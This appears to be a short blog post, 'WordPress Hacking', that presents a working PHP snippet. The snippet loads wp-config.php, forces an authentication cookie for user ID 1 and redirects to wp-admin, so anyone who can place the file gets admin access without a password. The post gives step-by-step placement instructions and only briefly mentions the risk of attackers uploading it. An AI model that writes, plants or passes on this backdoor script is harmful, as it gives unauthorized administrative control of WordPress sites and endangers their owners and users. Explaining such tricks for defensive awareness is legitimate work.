WordPress Hacking
This may be a bit of an old trick, however since it is alive an well and working in WordPress 3.5.2 (current version when this was first posted – actual current version for repost is 4.8.2 and it still works), it is being addressed again (for the first time on this site).
As you may know, if you have access to the database for a wordpress site, you can easily change the admin password. However, this clever little trick below, allows the user (attacker ?) access to login to your system as admin (or any other user if they know the userid, which is exposed through posts, blog articles, etc on most websites running wordpress).
1 2 3 4 5 6 7 8 9 10 | include('wp-config.php'); $user_id = 1; // Default admin user id. (usually the first user entered into the database) $remember = 1; // Remember Session (14 days approx) $secure = 0; // Use SSL // Force authorization as the above user without password wp_set_auth_cookie( $user_id, $remember, $secure ); header('location: ./wp-admin/'); |
All you need to do, is create a file in the WordPress root, and paste the above code. If you do not have access to the root directory of WordPress, that is okay; you just create the file anywhere, and update the code to where ‘wp-config.php’ is located in relation to where you created a new file with this code.
The scary part, is that a potential attacker could trample all over your WordPress installation if granted enough access to upload a script like the above — and it doesn’t matter where the upload happens.